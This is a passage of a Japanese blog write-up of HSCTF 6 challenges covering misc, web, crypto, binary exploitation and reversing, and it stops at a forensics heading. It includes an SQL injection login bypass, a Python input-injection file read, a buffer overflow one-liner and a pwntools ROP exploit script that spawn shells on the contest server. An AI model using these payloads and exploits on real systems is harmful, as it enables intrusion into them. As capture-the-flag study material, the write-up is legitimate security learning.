HSCTF 6 忘備録

Welcomeしか解けなくて悲しみに包まれている。

Miscellaneous

Discord

Join our Discord server to stay up-to-date on everything!

f:id:Yunolay:20190605192053p:plain

FLAG : hsctf{hi_welcome_to_discord}

Verbose

My friend sent me this file, but I don't understand what I can do with these 6 different characters...

verbose.txt

verbose.txtが与えられる。

verbose.txt f:id:Yunolay:20190605192842p:plain

明らかにjavascriptなのでjsにして実行する。

index.html

<script src="script.js"></script>

scriptを実行するとhttps://hsctf.com/に飛ばされるのでVScodeデバッグする。

f:id:Yunolay:20190605192611p:plain

FLAG : hsctf{esoteric_javascript_is_very_verbose}

Admin Pass

Hey guys, found a super cool website at
http://misc.hsctf.com:8001!

アクセスすると以下のようなページ

f:id:Yunolay:20190605192958p:plain

とりあえずパスワードを入れてみる。

f:id:Yunolay:20190605193057p:plain

gitlabのリンクがあるので確認するとsource codeが見れる。

f:id:Yunolay:20190605193149p:plain

md5の6df4c2a41091d8c737db7a44e3d07fb3と比較してるがhashcrack出来なかった。 rockyouのhashと比較したり無駄な時間を使ってしまった。

commitを確認したら6df4c2a41091d8c737db7a44e3d07fb3と比較する前のパスワードがあった。

f:id:Yunolay:20190605193339p:plain

FLAG : hsctf{i_love_richard_stallman_hes_so_cute_8a65926fcdcdac0b}

A Simple Conversation

Someone on the internet wants to talk to you. Can you find out what they want?

nc misc.hsctf.com 9001

talk.py

talk.py f:id:Yunolay:20190605195257p:plain

多分正しい挙動

$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> 1
Wow!
Sometimes I wish I was 1
Well, it was nice meeting you, 1-year-old.
Goodbye!

sleepを与えたら <built-in function sleep>が帰ってきた。 なんでかは知らない。

$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> sleep
Wow!
Sometimes I wish I was <built-in function sleep>
Well, it was nice meeting you, <built-in function sleep>-year-old.
Goodbye!

定義されてる関数は使えそうなのでopen()を使用して flag.txtを読み込みread()する

nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> open('flag.txt','r').read()
Wow!
Sometimes I wish I was hsctf{plz_u5e_pyth0n_3}

Well, it was nice meeting you, hsctf{plz_u5e_pyth0n_3}
-year-old.
Goodbye!

FLAG : hsctf{plz_u5e_pyth0n_3}

Locked Up

My friend gave me a zip file with the flag in it, but the zip file is encrypted. Can you help me open the zip file?

locked.zip

zipfileが与えられる。 問題文とかからzipのfix系かなって思った。

$ file locked.zip 
locked.zip: Zip archive data, at least v1.0 to extract

GitHub - TheZ3ro/zipfix: Fix zip files with broken central directory

$ git clone https://github.com/TheZ3ro/zipfix
Cloning into 'zipfix'...
remote: Enumerating objects: 9, done.
remote: Total 9 (delta 0), reused 0 (delta 0), pack-reused 9
Unpacking objects: 100% (9/9), done.
Checking connectivity... done.
$ python3 zipfix.py ../locked.zip 
Reading ../locked.zip Central Directory
Found 854 file(s) from Central Directory:
- !lBo;!71}c'&!?m$NAtfBLH
- !l^-W~zN>?}i*{jRYG:=X=b:5Hdp7U
- !m9*t0r9Rf%V"
- !_bubre6A{|TB:Q`#X1Vu#Zm<V

(snip)

Found |302h9hPejA%
Found |AaNiHN`@F
Found |A?6osWf:v&,iYo-Ol_][r7xgb1
Found |FT]H;.lP,}|
Found |p}S)_~]A2"
Found |q):;.1SwG#FiF
Found |x7gWJmb@QcNwWhY
Found start of central directory.  All entries processed.

解凍できてた。

$ ls | grep hs
hsctf{w0w_z1ps_ar3nt_th@t_secUr3}
V5-FM[E{obm.%>hs@C|;aG_.

FLAG : hsctf{w0w_z1ps_ar3nt_th@t_secUr3}

Hidden Flag

This image seems wrong.....did Keith lose the key again?

chall.png

明らかにxorされてる。 f:id:Yunolay:20190606174833p:plain

参考にしました。

GitHub - hellman/xortool: A tool to analyze multi-byte xor cipher

Xortool - aldeid

$ xortool chall.png 
The most probable key lengths:
   1:   10.4%
   3:   12.8%
   6:   11.2%
   9:   18.7%
  12:   8.3%
  15:   7.3%
  18:   12.0%
  21:   5.4%
  27:   8.1%
  36:   5.8%
Key-length can be 3*n
Most possible char is needed to guess the key!

$ xortool -l 9 -c 00 chall.png
1 possible key(s) of length 9:
invisible
Found 0 plaintexts with 95.0%+ valid characters
See files filename-key.csv, filename-char_used-perc_valid.csv

f:id:Yunolay:20190606175110p:plain

FLAG : hsctf{n0t_1nv1s1bl3_an5m0r3?-39547632}

The Real Reversal

My friend gave me some fancy text, but it was reversed, and so I tried to reverse it but I think I messed it up further. Can you find out what the text says?

reversed.txt

reversed.txt f:id:Yunolay:20190605213207p:plain

文字コード系の問題。問題文、与えられたファイル名からreverseすると推測出来る。

f = open('reversed.txt', 'rb').read()

reversed_data = f[::-1]

print(reversed_data)

逆から読めば読めそう。 f:id:Yunolay:20190605213516p:plain

cat reverse | rev > result

f:id:Yunolay:20190605213646p:plain

FLAG : hsctf{utf8_for_the_win}

Web

Inspect Me

Keith's little brother messed up some things...

https://inspect-me.web.chal.hsctf.com

Note: There are 3 parts to the flag!

アクセスすると真っ暗なページ f:id:Yunolay:20190605234632p:plain

Developer toolでindex.htmlのソースみたらflagのpart1 f:id:Yunolay:20190605234702p:plain

style.cssにflag part2 f:id:Yunolay:20190605234743p:plain

script.jsにflag part3 f:id:Yunolay:20190605234813p:plain

FLAG : hsctf{that_was_pretty_easy_right}

Agent Keith

Keith was looking at some old browsers and made a site to hold his flag.

https://agent-keith.web.chal.hsctf.com

アクセスするとDeniedされる f:id:Yunolay:20190605235348p:plain

ソースを見るとUser AgentってNCSA_Mosaic/2.0 (Windows 3.1)にしてくださいって書いてある。 f:id:Yunolay:20190605235424p:plain

<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
        <title>agent-keith</title>
        <link rel="stylesheet" href="http://localhost:8002/static/style.css">
    </head>
    <body>
        <main>
            <h2>If you're not Keith, you won't get the flag!</h2>
            <p><b>Your agent is:</b> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</p>
            <p><b>Flag:</b> Access Denied</p>
            <!-- DEBUG (remove me!!): NCSA_Mosaic/2.0 (Windows 3.1) -->
        </main>
    </body>
</html>

User-Agent SwitcherでNCSA_Mosaic/2.0 (Windows 3.1)にした。 f:id:Yunolay:20190605235535p:plain

f:id:Yunolay:20190605235611p:plain

FLAG : hsctf{wow_you_are_agent_keith_now}

S-Q-L

Keith keeps trying to keep his flag safe. This time, he used a database and some PHP.

https://s-q-l.web.chal.hsctf.com/

アクセスするとこんなページ f:id:Yunolay:20190605235845p:plain

試しにいつもの入れた。

username : ' or 1=1; --
password : ' or 1=1; --

f:id:Yunolay:20190605235930p:plain

username : ' or 1=1; #
password : ' or 1=1; #

f:id:Yunolay:20190606000129p:plain

FLAG : hsctf{mysql_real_escape_string}

The Quest

You think you are worthy of obtaining the flag? Try your hand at The Quest to Obtain the Flag.

アクセスするとGoogle form? f:id:Yunolay:20190606000355p:plain

どっかで比較してるのかなって思って適当に入力してソースみたらFlagがいた

f:id:Yunolay:20190606000457p:plain

FLAG : hsctf{google_forms_regex_cant_stop_nobody}

Cryptography

Reverse Search Algorithm

WWPHSN students, gotta get these points to boost your grade.

n = 561985565696052620466091856149686893774419565625295691069663316673425409620917583731032457879432617979438142137
e = 65537
c = 3280552792121286168982038099830397087874903846507258907

ただのRSAですな。

GitHub - Ganapati/RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data

RsaCtfTool (master ?) $ python RsaCtfTool.py -n 561985565696052620466091856149686893774419565625295691069663316673425409620917583731032457879432617979438142137 -e 65537 --uncipher 328055279212128616898203809983039708787490384650725890748576927208883055381430000756624369636820903704775835777

[+] Clear text : hsctf{y3s_rsa_1s_s0lved_10823704961253}

FLAG : hsctf{y3s_rsa_1s_s0lved_10823704961253}

Welcome to Crypto Land

Crypto land is fun! Decrypt:

KZ6UaztNnau6z39oMHUu8UTvdmq1bhob3CcEFdWXRfxJqdUAiNep4pkvkAZUSn9CvEvPNT5r2zt6JPg9bVBPYuTW4xr8v2PuPxVuCT6MLJWDJp84

base58でdecodeした。

KZ6UaztNnau6z39oMHUu8UTvdmq1bhob3CcEFdWXRfxJqdUAiNep4pkvkAZUSn9CvEvPNT5r2zt6JPg9bVBPYuTW4xr8v2PuPxVuCT6MLJWDJp84  
Welcome to HSCTF! This is your flag: hsctf{w0w_th1s_1s_my_f1rst_crypt0_chall3ng3?}  

FLAG : hsctf{w0w_th1s_1s_my_f1rst_crypt0_chall3ng3?}

Binary Exploitation

Intro to Netcat

Hey there! This challenge is a quick introduction to netcat and how to use it. Netcat is a program that will help you "talk" with many of our challenges, especially pwn and misc. To begin, Windows users should download this file:
Alternative download that might work
Extract the file, then open a command prompt and navigate to the directory using cd <download-directory>. From there, you can run nc misc.hsctf.com 1111 to get your first flag.

Have fun!

nc.zipが与えられる。
ncするだけ。
自分はcyg-getかなんかでnetcat入れてたからwindowsからでもnc出来た。

$ nc misc.hsctf.com 1111
Hey, here's your flag! hsctf{internet_cats}

FLAG : hsctf{internet_cats}

Return to Sender

Who knew the USPS could lose a letter so many times?

nc pwn.hsctf.com 1234

6/3/19 7:34 AM: Updated binary, SHA-1: 104fb76c3318fb44130c4a8ee50ac1a2f52d4082 return-to-sender

return-to-sender
return-to-sender.c

ソースとバイナリが与えられる。

return-to-sender.c

#include <stdlib.h>
#include <string.h>
#include <stdio.h>

void win() {
    system("/bin/sh");
}

void vuln() {
    char dest[8];
    printf("Where are you sending your mail to today? ");
    gets(dest);
    printf("Alright, to %s it goes!\n", dest);
}

int main() {
    setbuf(stdout, NULL);
    gid_t gid = getegid();
    setresgid(gid,gid,gid);
    vuln();
    return 0;    
}

gets(dest);にバッファオーバーフローがある。 win()に飛ばせば勝ち。

$ file return-to-sender 
return-to-sender: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=72ea48b1220887f89f16d20ee21e4d21e1739421, for GNU/Linux 3.2.0, not stripped

$ checksec return-to-sender 
[*] '/home/user/Desktop/CTF/HSCTF 6/Pwn/Return to Sender/return-to-sender'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
gdb-peda$ pattern create 64
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'

EIP: 0x41412d41 ('A-AA')

gdb-peda$ pattern offset A-AA
A-AA found at offset: 20
$ (python -c "from pwn import *;print'\x41'* 20 + p32(0x080491b6) + '\n'"; cat) | nc pwn.hsctf.com 1234
Where are you sending your mail to today? Alright, to AAAAAAAAAAAAAAAAAAAA�� it goes!
ls
bin
dev
flag
lib
lib32
lib64
return-to-sender
return-to-sender.c
cat flag
hsctf{fedex_dont_fail_me_now}
^C

余談だけどこういう書き方も出来るらしい。

$ cat <(python -c "from pwn import *;print'\x41'* 20 + p32(0x080491b6) + '\n'";) - | nc pwn.hsctf.com 1234
Where are you sending your mail to today? Alright, to AAAAAAAAAAAAAAAAAAAA�� it goes!
ls
bin
dev
flag
lib
lib32
lib64
return-to-sender
return-to-sender.c
cat flag
hsctf{fedex_dont_fail_me_now}
^C

FLAG : hsctf{fedex_dont_fail_me_now}

Combo Chain Lite

Training wheels!

nc pwn.hsctf.com 3131

combo-chain-lite combo-chain-lite.c

バイナリとソースが渡される。

#include <stdlib.h>
#include <string.h>
#include <stdio.h>

void vuln() {
    char dest[8];
    printf("Here's your free computer: %p\n", system);
    printf("Dude you hear about that new game called /bin/sh");
    printf("? Enter the right combo for some COMBO CARNAGE!: ");
    gets(dest);
}

int main() {
    setbuf(stdout, NULL);
    gid_t gid = getegid();
    setresgid(gid,gid,gid);
    vuln();
    return 0;    
}
$ file combo-chain-lite 
combo-chain-lite: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=c56cc6916b1933494d1cc55ae82dcaf1cdf6693d, for GNU/Linux 3.2.0, not stripped

$ checksec combo-chain-lite 
[*] '/home/user/Desktop/CTF/HSCTF 6/Pwn/Combo Chain Lite/combo-chain-lite'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
gdb-peda$ pattern create 64
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'

RSP: 0x7fffffffdd48 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RIP: 0x4011be (<vuln+88>: ret)

gdb-peda$ pattern offset AACAA-AA(
AACAA-AA( found at offset: 16

return addressまでのoffsetがわかったのでROPを組み立てる

--------------------------------------------
'A' * 16 # buf
--------------------------------------------
pop rdi ; ret  ;
--------------------------------------------
addr_bin_sh # 文字列で使ってたやつ
--------------------------------------------
addr_system # リークしてくれたやつ
--------------------------------------------

system

$ ./combo-chain-lite 
Here's your free computer: 0x7f37de6d4390 ←これ

addr_bin_sh

0x00402028 : Dude you hear about that new game called /bin/sh
$ echo Dude you hear about that new game called | wc -c
41
bin_sh = 0x00402028 + 41

0x00402028から文字列が始まって41文字足したところからが/bin/sh

exploit.py

from pwn import *

def send_payload(payload):
    log.info("payload = %s" % repr(payload))
    r.send(payload)
    return

def sendline_payload(payload):
    log.info("payload = %s" % repr(payload))
    r.sendline(payload)
    return

def print_address(s, addr):
    log.info(s + ' : ' + hex(addr))
    return

binary = './combo-chain-lite'
host ='pwn.hsctf.com'
port = 3131

elf = ELF(binary)
context.binary = binary
# context.log_level = 'debug'

REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
if REMOTE:
    # remote
    r = remote(host, port)
else:
    # local
    r = process(binary)
    libc = elf.libc

'''
0x00402028 : Dude you hear about that new game called /bin/sh
$ echo Dude you hear about that new game called | wc -c
41
'''

bin_sh = 0x00402028 + 41

data = r.recvline()
addr_system = int(data[-15:], 16)
print_address('addr_system', addr_system)
print r.recvuntil(': ')

'''
Gadget
rp --file combo-chain-lite --unique --rop 5
0x00401273: pop rdi ; ret  ;  (1 found)
'''

payload = ''
payload += 'A' * 16

payload += pack(0x00401273)
payload += pack(bin_sh)
payload += pack(addr_system)

sendline_payload(payload)

r.interactive()

実行結果

python exploit.py r
[*] '/home/user/Desktop/CTF/HSCTF 6/Pwn/Combo Chain Lite/combo-chain-lite'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to pwn.hsctf.com on port 3131: Done
[*] addr_system : 0x7f2e5533e390
Dude you hear about that new game called /bin/sh? Enter the right combo for some COMBO CARNAGE!: 
[*] payload = 'AAAAAAAAAAAAAAAAs\x12@\x00\x00\x00\x00\x00Q @\x00\x00\x00\x00\x00\x90\xe33U.\x7f\x00\x00'
[*] Switching to interactive mode
$ ls
bin
combo-chain-lite
combo-chain-lite.c
dev
flag
lib
lib32
lib64
$ cat flag
hsctf{wheeeeeee_that_was_fun}
$ 
[*] Interrupted
[*] Closed connection to pwn.hsctf.com port 3131

FLAG : hsctf{wheeeeeee_that_was_fun}

Reversal

A Byte

Just one byte makes all the difference.

a-byte

$ file a-byte 
a-byte: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=88fe0ee8aed1a070d6555c7e9866e364a40f686c, stripped

バイナリが与えられる。

$ ./a-byte 
u do not know da wae

radare2で解析する。

 r2 a-byte 
 -- OpenBSD might pledge r2 but r2 unveils OpenBSD.
[0x00000630]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Enable constraint types analysis for variables
[0x00000630]> afl
0x00000000    2 25           loc.imp._ITM_deregisterTMCloneTable
0x000005b8    3 23           fcn.000005b8
0x000005e0    1 6            sym.imp.puts
0x000005f0    1 6            sym.imp.strlen
0x00000600    1 6            sym.imp.__stack_chk_fail
0x00000610    1 6            sym.imp.strcmp
0x00000620    1 6            fcn.00000620
0x00000630    1 42           entry0
0x00000660    4 50   -> 40   fcn.00000660
0x000006f0    5 58   -> 51   entry.fini0
0x00000730    5 154  -> 67   entry.init0
0x0000073a   14 365          main
[0x00000630]> s main
[0x0000073a]> pdf
/ (fcn) main 365
|   int main (int argc, char **argv, char **envp);
|           ; var int32_t var_50h @ rbp-0x50
|           ; var int32_t var_44h @ rbp-0x44
|           ; var int32_t var_40h @ rbp-0x40
|           ; var int32_t var_3ch @ rbp-0x3c
|           ; var int32_t var_38h @ rbp-0x38
|           ; var int32_t var_30h @ rbp-0x30
|           ; var int32_t var_2fh @ rbp-0x2f
|           ; var int32_t var_2eh @ rbp-0x2e
|           ; var int32_t var_2dh @ rbp-0x2d
|           ; var int32_t var_2ch @ rbp-0x2c
|           ; var int32_t var_2bh @ rbp-0x2b
|           ; var int32_t var_2ah @ rbp-0x2a
|           ; var int32_t var_29h @ rbp-0x29
|           ; var int32_t var_28h @ rbp-0x28
|           ; var int32_t var_27h @ rbp-0x27
|           ; var int32_t var_26h @ rbp-0x26
|           ; var int32_t var_25h @ rbp-0x25
|           ; var int32_t var_24h @ rbp-0x24
|           ; var int32_t var_23h @ rbp-0x23
|           ; var int32_t var_22h @ rbp-0x22
|           ; var int32_t var_21h @ rbp-0x21
|           ; var int32_t var_20h @ rbp-0x20
|           ; var int32_t var_1fh @ rbp-0x1f
|           ; var int32_t var_1eh @ rbp-0x1e
|           ; var int32_t var_1dh @ rbp-0x1d
|           ; var int32_t var_1ch @ rbp-0x1c
|           ; var int32_t var_1bh @ rbp-0x1b
|           ; var int32_t var_1ah @ rbp-0x1a
|           ; var int32_t var_19h @ rbp-0x19
|           ; var int32_t var_18h @ rbp-0x18
|           ; var int32_t var_17h @ rbp-0x17
|           ; var int32_t var_16h @ rbp-0x16
|           ; var int32_t var_15h @ rbp-0x15
|           ; var int32_t var_14h @ rbp-0x14
|           ; var int32_t var_13h @ rbp-0x13
|           ; var int32_t var_12h @ rbp-0x12
|           ; var int32_t var_11h @ rbp-0x11
|           ; var int32_t var_10h @ rbp-0x10
|           ; var int32_t var_fh @ rbp-0xf
|           ; var int32_t var_eh @ rbp-0xe
|           ; var int32_t var_dh @ rbp-0xd
|           ; var int32_t var_8h @ rbp-0x8
|           ; arg int argc @ rdi
|           ; arg char **argv @ rsi
|           ; DATA XREF from entry0 (0x64d)
|           0x0000073a      55             push rbp
|           0x0000073b      4889e5         mov rbp, rsp
|           0x0000073e      4883ec50       sub rsp, 0x50               ; 'P'
|           0x00000742      897dbc         mov dword [var_44h], edi    ; argc
|           0x00000745      488975b0       mov qword [var_50h], rsi    ; argv
|           0x00000749      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=0x1128 ; '('
|           0x00000752      488945f8       mov qword [var_8h], rax
|           0x00000756      31c0           xor eax, eax
|           0x00000758      837dbc02       cmp dword [var_44h], 2
|       ,=< 0x0000075c      741d           je 0x77b
|       |   0x0000075e      90             nop
|      ,==< 0x0000075f      eb04           jmp 0x765
|      ||   ; CODE XREF from main (0x79a)
|     .---> 0x00000761      90             nop
|    ,====< 0x00000762      eb01           jmp 0x765
|    |:||   ; CODE XREF from main (0x87a)
|   .-----> 0x00000764      90             nop
|   :|:||   ; CODE XREFS from main (0x75f, 0x762)
|   :`-`--> 0x00000765      488d3dc80100.  lea rdi, str.u_do_not_know_da_wae ; 0x934 ; "u do not know da wae"
|   : : |   0x0000076c      e86ffeffff     call sym.imp.puts           ; int puts(const char *s)
|   : : |   0x00000771      b8ffffffff     mov eax, 0xffffffff         ; -1
|   : :,==< 0x00000776      e916010000     jmp 0x891
|   : :||   ; CODE XREF from main (0x75c)
|   : :|`-> 0x0000077b      488b45b0       mov rax, qword [var_50h]
|   : :|    0x0000077f      488b4008       mov rax, qword [rax + 8]    ; [0x8:8]=0
|   : :|    0x00000783      488945c8       mov qword [var_38h], rax
|   : :|    0x00000787      488b45c8       mov rax, qword [var_38h]
|   : :|    0x0000078b      4889c7         mov rdi, rax
|   : :|    0x0000078e      e85dfeffff     call sym.imp.strlen         ; size_t strlen(const char *s)
|   : :|    0x00000793      8945c4         mov dword [var_3ch], eax
|   : :|    0x00000796      837dc423       cmp dword [var_3ch], 0x23   ; '#'
|   : `===< 0x0000079a      75c5           jne 0x761
|   :  |    0x0000079c      c745c0000000.  mov dword [var_40h], 0
|   :  |,=< 0x000007a3      eb28           jmp 0x7cd
|   :  ||   ; CODE XREF from main (0x7d3)
|   : .---> 0x000007a5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007a8      4863d0         movsxd rdx, eax
|   : :||   0x000007ab      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007af      4801d0         add rax, rdx
|   : :||   0x000007b2      0fb608         movzx ecx, byte [rax]
|   : :||   0x000007b5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007b8      4863d0         movsxd rdx, eax
|   : :||   0x000007bb      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007bf      4801d0         add rax, rdx
|   : :||   0x000007c2      83f101         xor ecx, 1
|   : :||   0x000007c5      89ca           mov edx, ecx
|   : :||   0x000007c7      8810           mov byte [rax], dl
|   : :||   0x000007c9      8345c001       add dword [var_40h], 1
|   : :||   ; CODE XREF from main (0x7a3)
|   : :|`-> 0x000007cd      8b45c0         mov eax, dword [var_40h]
|   : :|    0x000007d0      3b45c4         cmp eax, dword [var_3ch]
|   : `===< 0x000007d3      7cd0           jl 0x7a5
|   :  |    0x000007d5      c645d069       mov byte [var_30h], 0x69    ; 'i'
|   :  |    0x000007d9      c645d172       mov byte [var_2fh], 0x72    ; 'r'
|   :  |    0x000007dd      c645d262       mov byte [var_2eh], 0x62    ; 'b'
|   :  |    0x000007e1      c645d375       mov byte [var_2dh], 0x75    ; 'u'
|   :  |    0x000007e5      c645d467       mov byte [var_2ch], 0x67    ; 'g'
|   :  |    0x000007e9      c645d57a       mov byte [var_2bh], 0x7a    ; 'z'
|   :  |    0x000007ed      c645d676       mov byte [var_2ah], 0x76    ; 'v'
|   :  |    0x000007f1      c645d731       mov byte [var_29h], 0x31    ; '1'
|   :  |    0x000007f5      c645d876       mov byte [var_28h], 0x76    ; 'v'
|   :  |    0x000007f9      c645d95e       mov byte [var_27h], 0x5e    ; '^'
|   :  |    0x000007fd      c645da78       mov byte [var_26h], 0x78    ; 'x'
|   :  |    0x00000801      c645db31       mov byte [var_25h], 0x31    ; '1'
|   :  |    0x00000805      c645dc74       mov byte [var_24h], 0x74    ; 't'
|   :  |    0x00000809      c645dd5e       mov byte [var_23h], 0x5e    ; '^'
|   :  |    0x0000080d      c645de6a       mov byte [var_22h], 0x6a    ; 'j'
|   :  |    0x00000811      c645df6f       mov byte [var_21h], 0x6f    ; 'o'
|   :  |    0x00000815      c645e031       mov byte [var_20h], 0x31    ; '1'
|   :  |    0x00000819      c645e176       mov byte [var_1fh], 0x76    ; 'v'
|   :  |    0x0000081d      c645e25e       mov byte [var_1eh], 0x5e    ; '^'
|   :  |    0x00000821      c645e365       mov byte [var_1dh], 0x65    ; 'e'
|   :  |    0x00000825      c645e435       mov byte [var_1ch], 0x35    ; '5'
|   :  |    0x00000829      c645e55e       mov byte [var_1bh], 0x5e    ; '^'
|   :  |    0x0000082d      c645e676       mov byte [var_1ah], 0x76    ; 'v'
|   :  |    0x00000831      c645e740       mov byte [var_19h], 0x40    ; segment.PHDR
|   :  |    0x00000835      c645e832       mov byte [var_18h], 0x32    ; '2'
|   :  |    0x00000839      c645e95e       mov byte [var_17h], 0x5e    ; '^'
|   :  |    0x0000083d      c645ea39       mov byte [var_16h], 0x39    ; '9'
|   :  |    0x00000841      c645eb69       mov byte [var_15h], 0x69    ; 'i'
|   :  |    0x00000845      c645ec33       mov byte [var_14h], 0x33    ; '3'
|   :  |    0x00000849      c645ed63       mov byte [var_13h], 0x63    ; 'c'
|   :  |    0x0000084d      c645ee40       mov byte [var_12h], 0x40    ; segment.PHDR
|   :  |    0x00000851      c645ef31       mov byte [var_11h], 0x31    ; '1'
|   :  |    0x00000855      c645f033       mov byte [var_10h], 0x33    ; '3'
|   :  |    0x00000859      c645f138       mov byte [var_fh], 0x38     ; '8'
|   :  |    0x0000085d      c645f27c       mov byte [var_eh], 0x7c     ; '|'
|   :  |    0x00000861      c645f300       mov byte [var_dh], 0
|   :  |    0x00000865      488b55c8       mov rdx, qword [var_38h]
|   :  |    0x00000869      488d45d0       lea rax, [var_30h]
|   :  |    0x0000086d      4889d6         mov rsi, rdx
|   :  |    0x00000870      4889c7         mov rdi, rax
|   :  |    0x00000873      e898fdffff     call sym.imp.strcmp         ; int strcmp(const char *s1, const char *s2)
|   :  |    0x00000878      85c0           test eax, eax
|   `=====< 0x0000087a      0f85e4feffff   jne 0x764
|      |    0x00000880      488d3dc20000.  lea rdi, str.Oof__ur_too_good ; 0x949 ; "Oof, ur too good"
|      |    0x00000887      e854fdffff     call sym.imp.puts           ; int puts(const char *s)
|      |    0x0000088c      b800000000     mov eax, 0
|      |    ; CODE XREF from main (0x776)
|      `--> 0x00000891      488b75f8       mov rsi, qword [var_8h]
|           0x00000895      644833342528.  xor rsi, qword fs:[0x28]
|       ,=< 0x0000089e      7405           je 0x8a5
|       |   0x000008a0      e85bfdffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
|       |   ; CODE XREF from main (0x89e)
|       `-> 0x000008a5      c9             leave
\           0x000008a6      c3             ret

0x40がなにかわかんなかったけどとりあえず以下でxor 1してる。

  : .---> 0x000007a5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007a8      4863d0         movsxd rdx, eax
|   : :||   0x000007ab      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007af      4801d0         add rax, rdx
|   : :||   0x000007b2      0fb608         movzx ecx, byte [rax]
|   : :||   0x000007b5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007b8      4863d0         movsxd rdx, eax
|   : :||   0x000007bb      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007bf      4801d0         add rax, rdx
|   : :||   0x000007c2      83f101         xor ecx, 1
|   : :||   0x000007c5      89ca           mov edx, ecx
|   : :||   0x000007c7      8810           mov byte [rax], dl
|   : :||   0x000007c9      8345c001       add dword [var_40h], 1
|   : :||   ; CODE XREF from main (0x7a3)

一応IDAでも見た。

.text:00000000000007D5 058 mov     [rbp+s1], 69h ; 'i'
.text:00000000000007D9 058 mov     [rbp+var_2F], 72h ; 'r'
.text:00000000000007DD 058 mov     [rbp+var_2E], 62h ; 'b'
.text:00000000000007E1 058 mov     [rbp+var_2D], 75h ; 'u'
.text:00000000000007E5 058 mov     [rbp+var_2C], 67h ; 'g'
.text:00000000000007E9 058 mov     [rbp+var_2B], 7Ah ; 'z'
.text:00000000000007ED 058 mov     [rbp+var_2A], 76h ; 'v'
.text:00000000000007F1 058 mov     [rbp+var_29], 31h ; '1'
.text:00000000000007F5 058 mov     [rbp+var_28], 76h ; 'v'
.text:00000000000007F9 058 mov     [rbp+var_27], 5Eh ; '^'
.text:00000000000007FD 058 mov     [rbp+var_26], 78h ; 'x'
.text:0000000000000801 058 mov     [rbp+var_25], 31h ; '1'
.text:0000000000000805 058 mov     [rbp+var_24], 74h ; 't'
.text:0000000000000809 058 mov     [rbp+var_23], 5Eh ; '^'
.text:000000000000080D 058 mov     [rbp+var_22], 6Ah ; 'j'
.text:0000000000000811 058 mov     [rbp+var_21], 6Fh ; 'o'
.text:0000000000000815 058 mov     [rbp+var_20], 31h ; '1'
.text:0000000000000819 058 mov     [rbp+var_1F], 76h ; 'v'
.text:000000000000081D 058 mov     [rbp+var_1E], 5Eh ; '^'
.text:0000000000000821 058 mov     [rbp+var_1D], 65h ; 'e'
.text:0000000000000825 058 mov     [rbp+var_1C], 35h ; '5'
.text:0000000000000829 058 mov     [rbp+var_1B], 5Eh ; '^'
.text:000000000000082D 058 mov     [rbp+var_1A], 76h ; 'v'
.text:0000000000000831 058 mov     [rbp+var_19], 40h ; '@'
.text:0000000000000835 058 mov     [rbp+var_18], 32h ; '2'
.text:0000000000000839 058 mov     [rbp+var_17], 5Eh ; '^'
.text:000000000000083D 058 mov     [rbp+var_16], 39h ; '9'
.text:0000000000000841 058 mov     [rbp+var_15], 69h ; 'i'
.text:0000000000000845 058 mov     [rbp+var_14], 33h ; '3'
.text:0000000000000849 058 mov     [rbp+var_13], 63h ; 'c'
.text:000000000000084D 058 mov     [rbp+var_12], 40h ; '@'
.text:0000000000000851 058 mov     [rbp+var_11], 31h ; '1'
.text:0000000000000855 058 mov     [rbp+var_10], 33h ; '3'
.text:0000000000000859 058 mov     [rbp+var_F], 38h ; '8'
.text:000000000000085D 058 mov     [rbp+var_E], 7Ch

f:id:Yunolay:20190605234013p:plain

0x40 = @ですな。 この文字列にxor 0x1をする。

irbugzv1v^x1t^jo1v^e5^v@2^9i3c@138|
def xor(msg, key):
    o = ''
    for i in range(len(msg)):
        o += chr(ord(msg[i]) ^ key)
    return o

s = 'irbugzv1v^x1t^jo1v^e5^v@2^9i3c@138|'

print(xor(s, 0x01))

実行結果

hsctf{w0w_y0u_kn0w_d4_wA3_8h2bA029}

FLAG : hsctf{w0w_y0u_kn0w_d4_wA3_8h2bA029}

Forensics

Chicken Crossing

